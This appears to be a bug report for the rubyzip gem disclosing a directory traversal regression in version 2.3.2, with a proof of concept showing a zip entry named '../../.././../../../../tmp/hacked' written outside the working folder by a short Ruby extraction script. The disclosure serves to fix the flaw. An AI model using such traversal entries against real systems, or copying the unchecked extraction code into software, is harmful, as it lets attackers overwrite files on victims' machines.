Directory traversal vulnerability #540
Description
Summary
In version 2.3.2, we are again experiencing the exact same problem as below.
#315
PoC
root@ea8d5cb86e9f:/work# ruby -v ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [aarch64-linux] root@ea8d5cb86e9f:/work# uname -a Linux ea8d5cb86e9f 5.15.64-0-virt #1-Alpine SMP Mon, 05 Sep 2022 08:02:49 +0000 aarch64 GNU/Linux root@ea8d5cb86e9f:/work# gem list | grep rubyzip rubyzip (2.3.2) root@ea8d5cb86e9f:/work# zipinfo traversal.zip Archive: traversal.zip Zip file size: 166 bytes, number of entries: 1 -rw-r--r-- 5.2 unx 0 t- defN 22-Nov-15 07:57 ../../.././../../../../tmp/hacked 1 file, 0 bytes uncompressed, 2 bytes compressed: 0.0% root@ea8d5cb86e9f:/work# ls -l /tmp total 0 root@ea8d5cb86e9f:/work# ruby extract.rb Extracting ../../.././../../../../tmp/hacked root@ea8d5cb86e9f:/work# ls -l /tmp total 0 -rw-r--r-- 1 root root 0 Nov 16 00:55 hacked extract.rb
require 'zip' Zip::File.open('traversal.zip') do |zip_file| # Handle entries one by one zip_file.each do |entry| # Extract to file/directory/symlink puts "Extracting #{entry.name}" entry.extract(entry.name) end end